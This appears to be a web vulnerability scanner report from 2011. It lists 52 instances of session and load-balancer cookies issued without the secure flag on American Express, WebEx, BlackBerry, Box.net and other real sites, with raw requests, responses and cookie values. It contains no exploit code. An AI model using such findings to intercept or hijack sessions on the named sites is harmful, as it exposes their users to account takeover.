HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 17:42:20 GMT Server: Apache/2.2.8 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes P3P: policyref="http://www.traffictrack.de/w3c/p3p.xml", CP="ALL DSP COR NID" Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1604
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
9. SSL cookie without secure flag setpreviousnext There are 52 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The following cookie was issued by the application and does not have the secure flag set:
sessionId=nullCookie; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1 Host: cibng.ibanking-services.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:24:55 GMT Server: IBM_HTTP_Server Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-Cache Set-Cookie: wf=wf Set-Cookie: sessionId=nullCookie; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 9003
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Personal Savings from American Express : Welcome to Personal Savings from American ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.aspx?tabid=168&appl_code=MEMBERS HTTP/1.1 Host: ebus.ota.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en-US"> <head id="Head"> <!--**********************************************************************************--> <!-- ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <title> American Express - Mem ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mw0305l/mywebex/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:59:22 GMT Server: Apache Content-Length: 3639 Set-Cookie: JSESSIONID=vG1dNNWKvTrnmZhJc7QHlY8p5PBcRt6fsv8sVgVQQ5zk46f6XVL2!-1021108312; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Set-Cookie: NSC_kmkcwxm=404467a20838;path=/ Connection: close Content-Type: text/html
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /profile/ HTTP/1.1 Host: www.blackberry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.box.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /reprints/order.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 44530 Content-Type: text/html Set-Cookie: ASPSESSIONIDCACARTTB=MHBALOKCEGMPNINNPNAKBMPM; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>SLACK Incorporated Periodicals Division</title> <STYLE type="text/css"> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/atshcstep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2544 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:47 GMT Set-Cookie: ASPSESSIONIDCACARTTB=KEBALOKCOFGEPEJFNBJCPGGJ; path=/ Cache-control: no-cache
<html> <head> <title>Athletic Training & Sports Health Care Subscription</title> </head> <style> a,body,td, p, blockquote, H5 { font-family: arial, helvetica, sans-serif; font-size:12px; ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /subscribe/newsubs/otistep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2526 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:43 GMT Set-Cookie: ASPSESSIONIDCACARTTB=JBBALOKCCLGHONAJLBLPKHGK; path=/ Cache-control: no-cache
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944526576342; path=/; expires=Tue, 09-Feb-16 22:22:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001PGzoPxDqqpRWVuPalmTJrf8:11m1380s8;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/home HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:11 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000HmJMpZYY_G5msSiTYEScCWJ:15bvkpc1o; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=252447242.47873.0000; path=/ Content-Length: 67227
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/marketingprograms?inav=menu_business_merchmarket HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:20 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=0000a-qFEyjWmRA77-ia4auLoKF:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 45136
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head>
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /merchant/marketing-data/pages/reportsandtrends HTTP/1.1 Host: www209.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:17 GMT Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: mertkit_JSESSIONID=000014rUJ6zb3offa-6mrx3LyBv:15bvkorqu; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Set-Cookie: BIGipServerwww260-443=873204234.47873.0000; path=/ Content-Length: 47317
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/OnlineSelf-Services/ConsumerLanding.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:30 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000sm8JxdH8S2k1shfy-P8NSQw:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/feefreeservices/pages/globalassist_allccsg_shareddetails.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:40 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000yMXBfzRiROj5OAfOa5QNbix:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/fraudprotectioncenter/fraudprotectioncenter_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:43 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=000090KnSa_PToPYn1Y9A6kHv8g:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/pass_markup_homepage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:34 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000ddg062iZbtkKQLHV7glhsR:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/personal/cardmember/additionalproductsandservices/giftcardsandtravelerscheques/travelerschequesandforeigncurrency.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:38 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00000vjRd_mY3YpSpW5gdtG8i9S:14qpqp8bv; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/privacystatement/internetprivacystatement.do?vgnextoid=f25533fadb4ca110VgnVCM100000defaad94RCRD&vgnextchannel=9823f30b6b1ca110VgnVCM100000defaad94RCRD&us_nu=footer&source=footer_privacy_statement HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:45 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000U01HD7ILpMUGqR_UyygusU9:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 55185
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Internet Privacy Statement</titl ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/en/smallbusiness/businesstravel/businesstravel.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:39 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00002CcYYbt_TpWnMDtRNICsW6f:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/acceptthecard.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:06 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000ah4vhZojFRvbev9f5GE_A4A:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/dom/us/merchants/nonsecure/manageyouraccount.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:47 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000PTe6zKm28D31BsFXcYHD9d8:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/contactus/personalsavings.do?vgnextoid=d752e13f929a7210VgnVCM100000defaad94RCRD&page=7&inav=iNavUtilContact HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:16 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000fxhwIOrKDi2q99FOvTDSEpr:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 35307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/fxip/fxinternationalpayments.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:10 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=0000gNZ28gvXI_sQMcByieAazU2:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 13749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dsmlive/dsm/int/us/en/cmaproductspage.do HTTP/1.1 Host: www212.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:19 GMT Server: IBM_HTTP_Server Set-Cookie: dsmLive_JSESSIONID=00005KkxZLI1O88IVa_7J24YNHg:14qpqp2b7; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 32770
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:33 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944613478399; path=/; expires=Tue, 09-Feb-16 22:23:33 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00000YZCQTdcKvGRMYP-Rq79eWY:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openhome/smallbusiness.do HTTP/1.1 Host: www257.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:41 GMT Server: IBM_HTTP_Server Pragma: No-cache Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=0000uChEcdO9k6KqbMgMdp5Ow2Q:14t0oj3g0; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en-US Content-Length: 888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /entertainmentaccess/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:49 GMT Server: IBM_HTTP_Server Set-Cookie: ehub_JSESSIONID=0000NpczdATYAiPRlcF0VGZHggr:1563unio9; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 80280
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Set-Cookie: fsea_JSESSIONID=00008GQpyAcWkVMiczzEQLBcHuM:156jli7te; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 36699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-report-monitoring/enquiry.do?inav=menu_myacct_creditsecure HTTP/1.1 Host: www295.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:23:45 GMT Server: IBM_HTTP_Server Location: https://www99.americanexpress.com/myca/usermgt/us/action?request_type=authreg_PPLogin&lgnsrc=PP&Face=en_US&REDIRECT_URL=https%3A%2F%2Fwww295.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenquiry.do%3FSC%3DL6L%26BC%3D0003%26PC%3D0001%26lgnsrc%3DPP%26Face%3Den_US Content-Length: 0 Set-Cookie: fsea_JSESSIONID=0000ax6luTP71CaQfFifYiUvIPV:156jli4a5; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Connection: close Content-Type: text/html Content-Language: en-US
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: axptravel.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/corporations.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home/global_splash.html HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Last-Modified: Fri, 26 Nov 2010 10:10:41 GMT Server: IBM_HTTP_Server Content-Type: text/html Cache-Control: no-store Expires: Sat, 05 Feb 2011 21:50:49 GMT Date: Sat, 05 Feb 2011 21:50:49 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: bandwidthdetect=vhigh; expires=Mon, 07-Mar-2011 21:50:49 GMT; path=/; domain=.americanexpress.com Content-Length: 37032
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD><TITLE>American Express</TITLE><META http-equiv=Content-Type content="text/html; charset=windows-1252"> <STYLE type='text/css ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/mt_personal.shtml HTTP/1.1 Host: home.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the secure flag set:
BIGipServerlct-pool=87351818.38687.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: lct.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" ETag: "AAAAAAAAAAA" Last-Modified: Fri, 14 May 2010 01:40:56 GMT Accept-Ranges: bytes Content-Type: text/html Content-Length: 0 Date: Sat, 05 Feb 2011 21:51:17 GMT Connection: close Set-Cookie: BIGipServerlct-pool=87351818.38687.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
